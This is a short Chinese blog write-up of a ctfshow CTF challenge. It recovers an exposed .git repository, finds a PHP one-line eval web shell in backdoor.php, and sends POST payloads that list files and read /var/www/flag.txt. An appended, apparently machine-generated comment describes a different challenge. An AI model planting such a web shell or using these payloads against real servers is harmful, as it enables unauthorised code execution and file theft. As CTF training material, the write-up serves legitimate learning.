ctfshow 红包题第七弹

Git_Extract进行扫描

python git_extract.py http://ab303c77-a623-4ab8-ad76-2992c7d35c50.challenge.ctf.show/.git/

然后 [huc-serverlow@parrot]─[~/Git_Extract-master]
└──╼ $cd ab303c77-a623-4ab8-ad76-2992c7d35c50.challenge.ctf.show

─[huc-serverlow@parrot]─[~/Git_Extract-master/ab303c77-a623-4ab8-ad76-2992c7d35c50.challenge.ctf.show]
└──╼ $cat backdoor.php
<!-- 36D姑娘留的后门,闲人免进 -->
<?php
        @eval($_POST['Letmein']);

 执行phpinfo();函数

 

查看当前文件夹

Letmein=print_r(glob('*'));

 

 得到flag

Letmein=highlight_file('/var/www/flag.txt');

 

 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
根据提供的引用内容,这道红包的目标是找到flag。在源代码中,我们可以看到一个GET参数cmd,它可以用来执行命令。然后,在引用中,我们可以看到一个POST请求,其中cmd参数被设置为`. /??p/p?p??????`,这可能是一个命令路径。通过修改POST请求,我们可以尝试找到flag.txt文件。根据引用中的内容,根目录下有flag.txt文件,因此我们可以尝试执行`ls /`命令来列出根目录中的文件。请记住,这是一个漏洞目,仅用于学习和研究目的,不要在未授权的情况下尝试攻击他人的服务器。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [CTFshow--web--红包第二](https://blog.csdn.net/weixin_45908624/article/details/128786662)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] - *3* [CTFSHOW 红包第二](https://blog.csdn.net/qq_46091464/article/details/107954930)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值